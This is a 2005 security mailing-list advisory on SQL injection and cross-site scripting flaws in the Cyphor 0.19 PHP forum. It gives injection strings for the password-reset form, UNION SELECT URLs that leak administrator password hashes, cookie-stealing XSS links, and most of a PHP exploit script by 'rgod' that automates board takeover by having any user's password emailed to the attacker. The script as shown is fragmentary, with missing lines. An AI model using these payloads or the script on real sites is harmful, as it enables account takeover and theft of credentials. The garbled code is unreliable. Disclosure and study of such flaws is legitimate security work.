From: SecuriTeam <>
To: [email protected]
Date: 10 Oct 2005 13:35:19 +0200
Subject: [UNIX] Cyphor Multiple Security Vulnerabilities (SQL Injection and CSS)
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Cyphor Multiple Security Vulnerabilities (SQL Injection and CSS)
<> Cyphor is "a configurable
Webforum, which uses PHP4's session capabilities to authenticate users,
the MySQL database system to store all its data in, and Cascading Style
Sheets (CSS) to configure the "Look and Feel" of the forum. Only
registered users can post messages, registered users are split up into
normal users, moderators and administrators. Moderators and administrators
can delete threads, administrators can change board settings, create new
forums etc".
Multiple security vulnerabilities have been discovered in Cyphor that
allow remote attackers to cause the program to execute arbitrary SQL
statement and include arbitrary HTML and/or JavaScript into pages returned
to users.
Vulnerable Systems:
* Cyphor version 0.19
If PHP's magic quotes have been set to off a remote attacker can trigger
numerous SQL injections:
SQL Injection in 'Forgot Password Interface':
The "Forgot your password?" feature allows you to send yourself a new
administrator password, this by supplying an SQL injecting string into the
information sent to the server:
email: [your_email]
nick: 'or'X'='X
This will trigger an email of the sorts of:
You have registered for a Cyphor forum (My Discussions). This is your
Your username is: 'or'X'='X
Your password is: mixa-13b
Now you can go to administration panel, create/edit/delete
forums/group/users, you can insert evil javascript code in terms of usage
or welcome message.
SQL Injection newmsg.php:
To see table_prefix (usually "cyphor_") use the following request:
You can cause the server to return the administrator password hash by
using the following URL:
http://[target]/[path]/newmsg.php?fid='' UNION SELECT nick, password,
null, null FROM [table_prefix]users /*
(it is encrypted by crypt() function with username as key, one way ... but
can try to brute force it)
Cross Site Scripting in newmsg.php:
The following URL will trigger an cross site scripting attack against
users viewing the below link:
http://[target]/[path]/newmsg.php?fid='' UNION SELECT null, "<
script>alert(document.cookie)< /script>", null, null/*
Cross Site Scripting in footer.php:
The following URL will trigger an cross site scripting attack against
users viewing the below link:
script>alert(document.cookie)< /script>
< ?php
# --- cyphor019_xpl.php 7.36 08/10/2005 #
# #
# Cyphor 0.19 ( possibly prior versions) SQL injection / board takeover #
# #
# by rgod #
# site: #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: launch this script from Apache, fill requested fields, then #
# send yourself any user / admin password right now! #
# #
# Sun Tzu: "There are five ways of attacking with fire. The first is to
burn #
# soldiers in their camp; the second is to burn stores; the third is to
burn #
# baggage trains; the fourth is to burn arsenals and magazines; the fifth
is #
# to hurl dropping fire amongst the opponent." #
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'< html>< head>< title>Cyphor 0.19 SQL Injection/board takeover <
/title>< meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> < style
type="text/css"> body { background-color:#111111;
SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important}
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size:
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} *
normal !important} *{text-decoration: none !important}
{ text-decoration: none ; color : #1CBr81; } a:hover{text-decoration:
color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica,
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,
font-weight:bold; font-style: italic;}-->< /style>< /head>< body>< p
Cyphor 0.19 (possibly prior versions) SQL injection / board takeover <
/p>< p
class="Stile6"> a script by rgod at < a href=""
target="_blank">< /a>< /p> < table
width="84%">< tr> < td
width="43%">< form name="form1" method="post"
< p>
< input type="text" name="host">< span class="Stile5"> hostname (ex:
com)< /span>< /p>< p>< input type="text" name="path">< span
class="Stile5"> path (ex:
/cyphor/ or /forum/ or just /)< /span>< /p>< p>< input type="text"
name="port">< span
class="Stile5"> specify a port other than 80 (default value)< /span>< /p><
p>< input
type="text" name="username">< span class="Stile5">user whom you want the
,admin? ;) < /span> < /p> < p> < input type="text" name="your_email"><
class="Stile5"> email where the password will be sent< /span> < /p> < p> <
type="text" name="proxy">< span class="Stile5"> send exploit through an
HTTP prox
y (ip:port) < /span>< /p>< p>< input type="submit" name="Submit"
value="go!">< /p>
< /form>< /td>< /tr>< /table>< /body>< /html>';
function show($headeri)
echo '< table border="0">< tr>';
while ($ii < = strlen($headeri)-1)
if ($ji==16) {
echo "< td> < /td>";
for ($li=0; $li< =15; $li++)
{ echo "< td>".$headeri[$li+$ki]."< /td>";
echo "< /tr>< tr>";
if (strlen($datai)==1) {echo "< td>0".$datai."< /td>";} else
{echo "< td>".$datai."< /td> ";}
for ($li=1; $li< =(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "< td>  < /td>";
for ($li=$ci*16; $li< =strlen($headeri); $li++)
{ echo "< td>".$headeri[$li]."< /td>";
echo "< /tr>< /table>";
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket($packet)
global $proxy, $host, $port, $html;
if ($proxy=='')
if (!$ock) { echo 'No response from '.htmlentities($host).'...';
if (!eregi($proxy_regex,$proxy))
{echo htmlentities($proxy).' -> not a valid proxy...';
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...< br>';
if (!$ock) { echo 'No response from proxy...';
if ($proxy=='')
while (!feof($ock))
while ((!feof($ock)) or
echo nl2br(htmlentities($html));
define('USER_PREG', '#^[A-Za-z0-9_\-]+$#');
if (($path< >'') and ($host< >'') and ($your_email< >'') and ($username<
if (!preg_match(EMAIL_PREG, $your_email)) {echo '< br>Need a valid
email...'; die;}
if (!preg_match(USER_PREG, $username)) {echo '< br>Need a valid
username...'; die;}
if ($port=='') {$port=80;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
#STEP 1 -> retrieve the table prefix...
$packet="GET ".$p."show.php?fid=' HTTP/1.0 \r\n";
$packet.="User-Agent: GetRight/4.5xx\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$temp=explode("SELECT * FROM ",$html);
$temp2=explode("forums WHERE",$temp[1]);
echo '< br> Table prefix ->'.htmlentities($table_prefix);
if ($table_prefix=='') {echo 'Exploit failed...'; die;}
#STEP 2 -> send yourself a new password...
$sql="') UNION SELECT * FROM ".$table_prefix."users WHERE
$packet="POST ".$p."lostpwd.php HTTP/1.1\r\n";
$packet.="Referer: http://".$host.":".$port.$path."lostpwd.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Internet Ninja x.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
if (eregi("New password sent.",$html)) {echo '< br>Exploit
successful...check your email box...';}
else {echo '< br>Exploit failed...';}
{ echo 'Fill in requested fields, optionally specify a proxy...'; }
The information has been provided by <>
The original article can be found at:
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